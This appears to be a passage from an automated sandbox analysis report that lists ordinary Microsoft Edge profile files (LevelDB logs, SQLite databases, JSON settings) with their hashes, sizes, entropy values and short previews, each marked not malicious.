                                                                                                                                                                                                                                                                                  SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                                                                                                                                  SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.160784383789535
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73T2yq2Pwkn23oH+Tcwt8NIFUt8O3Tc21Zmw+O3TcjRkwOwkn23oH+Tcwt8+eLJ:73T2yvYfYebpFUt8O3T7/+O3TcjR5JfO
                                                                                                                                                                                                                                                                                  MD5:836D3C4A12349E78B42448474B92C4D0
                                                                                                                                                                                                                                                                                  SHA1:244E119569FBD8EA333D1A8C3AA7954B48AA41B2
                                                                                                                                                                                                                                                                                  SHA-256:97D793C88E8DF0E75A2609F93828C5F3C5574F8194214CD4BA63FAEA4517B15D
                                                                                                                                                                                                                                                                                  SHA-512:8475CFEAB09C0B63FEFEA29BBD9AAF7DED5BC72085E95DF2C9C67136937E38148272C90F112A0B2D779E40CB8FB9E5C478B6F372555556979917EA55A1039BB3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.635 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:41:29.636 1e70 Recovering log #3.2024/12/10-12:41:29.637 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.160784383789535
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73T2yq2Pwkn23oH+Tcwt8NIFUt8O3Tc21Zmw+O3TcjRkwOwkn23oH+Tcwt8+eLJ:73T2yvYfYebpFUt8O3T7/+O3TcjR5JfO
                                                                                                                                                                                                                                                                                  MD5:836D3C4A12349E78B42448474B92C4D0
                                                                                                                                                                                                                                                                                  SHA1:244E119569FBD8EA333D1A8C3AA7954B48AA41B2
                                                                                                                                                                                                                                                                                  SHA-256:97D793C88E8DF0E75A2609F93828C5F3C5574F8194214CD4BA63FAEA4517B15D
                                                                                                                                                                                                                                                                                  SHA-512:8475CFEAB09C0B63FEFEA29BBD9AAF7DED5BC72085E95DF2C9C67136937E38148272C90F112A0B2D779E40CB8FB9E5C478B6F372555556979917EA55A1039BB3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.635 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:41:29.636 1e70 Recovering log #3.2024/12/10-12:41:29.637 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3169096321222068
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                                                                                                                                  MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                                                                                                                                  SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                                                                                                                                  SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                                                                                                                                  SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.40981274649195937
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                                                                                                                                  MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                                                                                                                                  SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                                                                                                                                  SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                                                                                                                                  SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5978007196409957
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:J8GuW386GL4U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjNRW:JMb+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                                                                                                                                  MD5:4B33FA41C836A3B777701A69A3217A73
                                                                                                                                                                                                                                                                                  SHA1:22400CAF7CCBB1892FD73EE5F4B6C949ACA291C5
                                                                                                                                                                                                                                                                                  SHA-256:01D91F7209E340C0096C83CFC17F513A0AB9185DC11AF4D25CE321937313899E
                                                                                                                                                                                                                                                                                  SHA-512:4D70E46252F7EC0A9AEB0B994E6DA6F5216D4DA28D6ABFB6FEA2254DEB3633E410A5C36F67E41D47E5C6AE3FDCDE5EAE2A9742BAF008D68F1E7102EF1E8114E8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3283577581710296
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:OA/J3+t76Y4QZZofU99pO0BYlISqR4EZY4QZvGEMn:vhHQws9LdlBQZGln
                                                                                                                                                                                                                                                                                  MD5:ABD119D2BE25FA86EACB75C324BDF206
                                                                                                                                                                                                                                                                                  SHA1:FD18DC40D842D50771BE8C409C145736F5F4650A
                                                                                                                                                                                                                                                                                  SHA-256:711B88D2D977004009CBDD6E7448FE4FD7B7E18C0E69BBA9F5325BA894B5A623
                                                                                                                                                                                                                                                                                  SHA-512:1E37EE617559ABA5EE831A7DE74363864DF428F7DD7C0D39078B04BCD1593B46465582F2716B5612A140C81B42283E69D067797FCC0BDD7534533FC4B717A820
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.549251445285301
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:zj9P0Rgam6I3hP773pLjQkQerOP/Kbt5RKToaAic9:zdrHp7te2OP/KRKcp9
                                                                                                                                                                                                                                                                                  MD5:83F6B5F3E8EAF4E16AB5E776DD1499A9
                                                                                                                                                                                                                                                                                  SHA1:240778CC21A4C42D573CD95E53933D0286900699
                                                                                                                                                                                                                                                                                  SHA-256:E58C31B875AE4F40063BE55D003CF300ED1D5B74C53258FB89466B3023D55D23
                                                                                                                                                                                                                                                                                  SHA-512:49967B77836AACF778A94073FD190D1086CED1C605FE7A2FA63E983C0518D2F0AB56F88D9A7145DB8A3B2052395D7F1D3008273C9590B8046FD83614D5CC585A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):406
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.229511233164337
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7wuvYfYeb8rcHEZrELFUt8Owc/+Owc5JfYeb8rcHEZrEZSJ:7wsYfYeb8nZrExg8OwswGJfYeb8nZrE8
                                                                                                                                                                                                                                                                                  MD5:CB50CEFDF81C3E9FB1153A41E69FE87D
                                                                                                                                                                                                                                                                                  SHA1:C602C790B1D630CD1622DAF0EA737A50D6057C15
                                                                                                                                                                                                                                                                                  SHA-256:1E72D6932FB02BD8DC104A2E84BC3FA8AF49BFE10DBDA2D52F35E272C1086E19
                                                                                                                                                                                                                                                                                  SHA-512:D6FF89E8C75FE61708AC6450F71A423ECAF747EE47320FF0043E012DC8784B42CF93E4977953EC711805A193B07C0FCF097752B80DC5F2D7B609D0E43C795F4D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:31.820 1e68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:41:31.821 1e68 Recovering log #3.2024/12/10-12:41:31.821 1e68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.148653010658664
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73QU+q2Pwkn23oH+Tcwt8a2jMGIFUt8O3fpXZmw+O37aVVkwOwkn23oH+Tcwt8as:73QU+vYfYeb8EFUt8O3fpX/+O3WVV5Jg
                                                                                                                                                                                                                                                                                  MD5:B1B1FBD20C6BC8F821B173B906AEA7A1
                                                                                                                                                                                                                                                                                  SHA1:A6E22051A033B0A5AE3BFC3296E67DE11046C556
                                                                                                                                                                                                                                                                                  SHA-256:BE9C1EAACE0606A585F749B00C51A1E41C2145CF0D94AD1A96FF134F0107FF03
                                                                                                                                                                                                                                                                                  SHA-512:7A64D83D246611058D3B075827BF7C91480F9D12D9A96F348DBA3ECD4BE12E795F85052E01808E485A87738A97FEBBCC1FDCA122E7D8092DE122EE4EE7C2E7EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.715 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:41:29.722 1f7c Recovering log #3.2024/12/10-12:41:29.725 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.863060653641558
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                                                                                                                  MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                                                                                                                  SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                                                                                                                  SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                                                                                                                  SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.40293591932113104
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                                                                                                                                  MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                                                                                                                                  SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                                                                                                                                  SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                                                                                                                                  SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.788754913993502
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                                                                                                                                                  MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                                                                                                                                                  SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                                                                                                                                                  SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                                                                                                                                                  SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"sts":[],"version":2}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1355
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.307879453487755
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YXsZI2bZVMdBsZTbZFRudFGcsZ2ZFGJ/NsIZ6ma3yeebscZCO4iYVbG7nby:YXseg8sbfcds0gnsYleebsECxbZ
                                                                                                                                                                                                                                                                                  MD5:55C9FB69ED07E76BFDB0A00DC87CB1D1
                                                                                                                                                                                                                                                                                  SHA1:AFAEF8B003BA953A4B7FA77EC5E1EFB1F75B8C16
                                                                                                                                                                                                                                                                                  SHA-256:F519BB0520FDCAB5158BAE5A622926A0A8AEFB6624BDC849EF5E5D8DB592F032
                                                                                                                                                                                                                                                                                  SHA-512:C263CCA09F435A4AA65934C994C5FAAF5FD0598D8C23A93B2805FB5A9879CADA4EA09B16094D2E961280EC29CE5C1F9332BD41B40B27EE6A4173DDA389FE58F0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918094867619","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918097683168","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918112691999","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378419718615279","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.136448891057489
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:TsKLopF+SawLUO1Xj8BWX7/jYzv3GHVE+IUgN5VGL:te+AuWLclZs
                                                                                                                                                                                                                                                                                  MD5:9BDCB37BF4999D265B4E741938FECD16
                                                                                                                                                                                                                                                                                  SHA1:9E9D699267068CD9FD694D2960443382C903000F
                                                                                                                                                                                                                                                                                  SHA-256:11B2302800E55B7027C3343FF99BC75CFE8E725375B87D20F53E4D20CA67742A
                                                                                                                                                                                                                                                                                  SHA-512:EB026E9D08582EB29A0A46D693D685BCDD32A24C4992AA4C97FD4E49BC03ABECC44D68D15766322293D2BB5A1A397974BD423889C3E38CF2E27996DC091FE637
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                   Preview:SQLite format 3
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
